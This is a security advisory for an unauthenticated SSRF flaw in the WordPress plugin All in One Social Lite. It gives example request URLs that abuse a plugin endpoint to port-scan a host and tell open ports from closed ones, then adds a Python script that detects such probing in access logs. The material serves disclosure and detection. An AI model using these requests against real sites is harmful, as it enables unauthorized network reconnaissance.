Wp Plugin All in One Social Lite

Plugin Details

Plugin Name: wp-plugin : all-in-one-social-lite
Affected Version : 1 (and most probably lower versions, if any)
Vulnerability : SSRF
Minimum Level of Access Required : Unauthenticated
CVE Number :
Identified by : Prajalkulkarni
WPScan Reference URL

Disclosure Timeline

Technical Details

For the purpose of demonstration we used scanme.nmap.org, where ports 80 and 22 are open and port 21 is closed.

1. Test for open port 80: http://localhost/wordpress/wp-content/wp-plugs/all-in-one-social-lite/ajax-cube3x-stumpleupon-count.php?url=scanme.nmap.org:80 The “in_index” key value is “true” for open ports (see OpenPort80.png).

2. Test for open non-HTTP ports (like SSH, FTP, SMTP etc.): the “in_index” key value is “true” for open ports (see OpenPort22.png).

3. Test for closed port 21: http://localhost/wordpress/wp-content/wp-plugs/all-in-one-social-lite/ajax-cube3x-stumpleupon-count.php?url=scanme.nmap.org:21 The “in_index” key value is “false” for closed ports (see ClosedPort21.png).
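For detection, the requests above leave a recognisable trace in the web server's access log: the same endpoint called with `url=` values that carry explicit, changing ports. The following is an added example (not part of the original advisory or the plugin's code) that scans access-log text for that pattern; it goes slightly beyond the three tests by also flagging loopback or private targets. The combined log format, the sweep threshold and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "ajax-cube3x-stumpleupon-count.php"  # file name from the advisory
WEB_PORTS = {80, 443}
SWEEP_THRESHOLD = 3  # assumed: distinct host:port targets per client
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log (combined format); client IPs are documentation ranges.
_PATH = "/wordpress/wp-content/wp-plugs/all-in-one-social-lite/" + ENDPOINT
_FMT = '{ip} - - [01/Jan/2015:10:00:0{n} +0000] "GET {p}?url={u} HTTP/1.1" 200 31'
SAMPLE_LOG = "\n".join(_FMT.format(ip=ip, n=n, p=_PATH, u=u) for n, (ip, u) in enumerate([
    ("203.0.113.7", "scanme.nmap.org:80"), ("203.0.113.7", "scanme.nmap.org:22"),
    ("203.0.113.7", "scanme.nmap.org:21"), ("198.51.100.9", "http://127.0.0.1:8080/"),
    ("192.0.2.44", "http://example.com/article")]))

def parse_target(value):
    """Return (host, port) for a url= value that may lack a scheme; port is None if absent."""
    try:
        parts = urlsplit(value if "://" in value else "//" + value)
        return (parts.hostname or "").lower(), parts.port
    except ValueError:  # malformed host or out-of-range port
        return value.lower(), -1

def is_internal(host):
    """True for localhost and for loopback, private or link-local IP literals."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local

def analyse(log_text):
    """Return (findings, sweeping_clients) for requests that hit ENDPOINT."""
    findings, targets = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or ENDPOINT not in m.group(2):
            continue
        client, request = m.groups()
        for value in parse_qs(urlsplit(request).query).get("url", []):
            host, port = parse_target(value)
            targets[client].add((host, port))
            if port is not None and port not in WEB_PORTS:
                findings.append((client, "non-web-port", f"{host}:{port}"))
            if is_internal(host):
                findings.append((client, "internal-target", host))
    sweeps = {c for c, t in targets.items() if len(t) >= SWEEP_THRESHOLD}
    return findings, sweeps
```

A client that appears in the sweep set has used the endpoint against several distinct host:port pairs, which matches the open/closed port tests shown above rather than normal share-count lookups.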